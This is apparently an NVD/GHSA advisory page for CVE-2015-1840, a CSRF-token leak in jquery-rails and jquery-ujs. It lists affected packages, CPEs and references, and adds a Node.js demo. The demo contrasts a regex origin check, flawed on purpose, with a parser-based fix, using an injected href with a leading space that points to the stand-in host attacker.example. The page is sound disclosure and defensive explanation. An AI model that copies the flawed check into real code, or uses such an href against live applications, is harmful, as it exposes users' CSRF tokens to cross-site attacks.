Moderate severity · NVD Advisory · Published Jul 26, 2015 · Updated Jun 17, 2026
CVE-2015-1840
Description
jquery_ujs.js in jquery-rails before 3.1.3 and 4.x before 4.0.4, and rails.js in jquery-ujs before 1.0.4, as used with Ruby on Rails 3.x and 4.x, allow remote attackers to bypass the Same Origin Policy and trigger transmission of a CSRF token to a different-domain web server via a leading space character in a URL within an attribute value. The client-side check that decides whether to add the X-CSRF-Token header to a remote (AJAX) request treats such a URL as same-origin, while the browser trims the space and sends the request, token included, to the other domain; an application is exposed when an attacker can influence the URL carried in such an attribute.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| jquery-rails | RubyGems | < 3.1.3 | 3.1.3 |
| jquery-rails | RubyGems | >= 4.0.0, < 4.0.4 | 4.0.4 |
| jquery-ujs | RubyGems | < 1.0.4 | 1.0.4 |
Affected products
CPE entries (NVD):
- cpe:2.3:a:rubyonrails:jquery-rails:*:*:*:*:*:*:*:* (range: <= 3.1.2)
- cpe:2.3:a:rubyonrails:jquery-rails:4.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:rubyonrails:jquery-rails:4.0.1:*:*:*:*:*:*:*
- cpe:2.3:o:fedoraproject:fedora:21:*:*:*:*:*:*:*
- cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
Package coordinates (GHSA, no CPE), with the version ranges the page lists in the same order:
- pkg:gem/jquery-rails (range: < 3.1.3)
- pkg:gem/jquery-ujs (range: < 1.0.4)
- pkg:rpm/opensuse/ruby3.2-rubygem-jquery-rails&distro=openSUSE%20Tumbleweed (range: < 4.5.1-1.3)
- pkg:rpm/opensuse/rubygem-jquery-rails&distro=openSUSE%20Tumbleweed (range: < 4.5.0-1.1)
Vulnerability mechanics
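The failure mode described above, as an added example that is not code from jquery-ujs, jquery-rails or jQuery: a regex-based same-origin test in the style of the `rurl` pattern jQuery's `$.ajax` used at the time (its exact form here is this example's assumption) is compared with a test that uses the WHATWG URL parser, which applies the same leading-whitespace stripping the browser applies before sending a request. The origin `https://app.example`, the host `attacker.example`, the token value and every function name are constructed for the example; it runs under Node.js with the built-in `URL` class and needs no DOM.

```javascript
// Added example for this advisory page: constructed to show why a URL with a
// leading space can be classified as same-origin by one check and as
// cross-domain by another. Not jquery-ujs, jquery-rails or jQuery source.

// Regex-based origin test. The pattern is modelled on the "rurl" regex that
// jQuery's $.ajax used for its crossDomain decision around 2015; treat its
// exact form as an assumption of this example. When the pattern does not
// match, parts is null and the original logic reported "not cross domain",
// the same outcome it gives a relative URL such as "/posts/1".
const RURL = /^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/;

function defaultPort(protocol) {
  return protocol === 'http:' ? '80' : '443';
}

function isCrossDomainRegex(pageOrigin, url) {
  const page = RURL.exec(pageOrigin.toLowerCase());
  const parts = RURL.exec(url.toLowerCase());
  // " http://attacker.example/..." fails to match at ^, so parts is null and
  // the request is wrongly treated as same-origin.
  return !!(parts && (
    parts[1] !== page[1] ||
    parts[2] !== page[2] ||
    (parts[3] || defaultPort(parts[1])) !== (page[3] || defaultPort(page[1]))
  ));
}

// Parser-based origin test. The WHATWG URL parser strips leading and trailing
// spaces and C0 controls, so " http://attacker.example/" resolves to the
// attacker's origin, exactly as the browser will resolve it when it sends
// the request. Anything that does not parse is treated as cross-domain, so
// the token is withheld by default.
function isCrossDomainParsed(pageOrigin, url) {
  let target;
  try {
    target = new URL(url, pageOrigin); // relative hrefs resolve against the page
  } catch (e) {
    return true;
  }
  return target.origin !== new URL(pageOrigin).origin;
}

// Simulates the ajax prefilter step: add X-CSRF-Token only when the supplied
// check says the request stays on the page's origin. "target" is the URL the
// browser would actually fetch after its own whitespace normalisation.
function buildRequest(pageOrigin, href, csrfToken, isCrossDomain) {
  const headers = {};
  if (!isCrossDomain(pageOrigin, href)) {
    headers['X-CSRF-Token'] = csrfToken;
  }
  let target = null;
  try {
    target = new URL(href, pageOrigin).href;
  } catch (e) {
    // unparseable href: nothing would be sent
  }
  return { target, headers };
}

// Constructed scenario: the page lives on https://app.example and an attacker
// has placed a remote link whose href starts with a space.
const PAGE_ORIGIN = 'https://app.example';
const CSRF_TOKEN = 'constructed-token-value';
const INJECTED_HREF = ' http://attacker.example/collect';

function demo() {
  const leaky = buildRequest(PAGE_ORIGIN, INJECTED_HREF, CSRF_TOKEN, isCrossDomainRegex);
  const fixed = buildRequest(PAGE_ORIGIN, INJECTED_HREF, CSRF_TOKEN, isCrossDomainParsed);
  console.log('regex check :', leaky.target, leaky.headers); // token travels to attacker.example
  console.log('parser check:', fixed.target, fixed.headers); // same target, no token attached
  return { leaky, fixed };
}

demo();
```

The point the example makes is that the decision to attach the token must be made on the URL as the browser will interpret it, not on a pattern that silently returns "no match" for input it cannot parse; a check that fails closed (unparseable means cross-domain) is the practitioner's default, and rejecting or trimming attribute values with leading whitespace on the server side is a cheap second layer.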
References
- groups.google.com/forum/message/raw (NVD: Exploit, Vendor Advisory)
- lists.fedoraproject.org/pipermail/package-announce/2015-June/160906.html (NVD: Third Party Advisory)
- lists.fedoraproject.org/pipermail/package-announce/2015-June/161043.html (NVD: Third Party Advisory)
- lists.opensuse.org/opensuse-updates/2015-07/msg00041.html (NVD: Third Party Advisory)
- github.com/advisories/GHSA-4whc-pp4x-9pf3 (GHSA: Advisory)
- github.com/rails/jquery-rails/blob/master/CHANGELOG.md (NVD: Vendor Advisory)
- github.com/rails/jquery-ujs/blob/master/CHANGELOG.md (NVD: Vendor Advisory)
- nvd.nist.gov/vuln/detail/CVE-2015-1840 (GHSA: Advisory)
- openwall.com/lists/oss-security/2015/06/16/15 (NVD)
- github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2015-1840.yml (GHSA)
- github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-ujs/CVE-2015-1840.yml (GHSA)
- groups.google.com/forum/ (GHSA)
- web.archive.org/web/20200228084945/http://www.securityfocus.com/bid/75239 (GHSA)
- www.securityfocus.com/bid/75239 (NVD)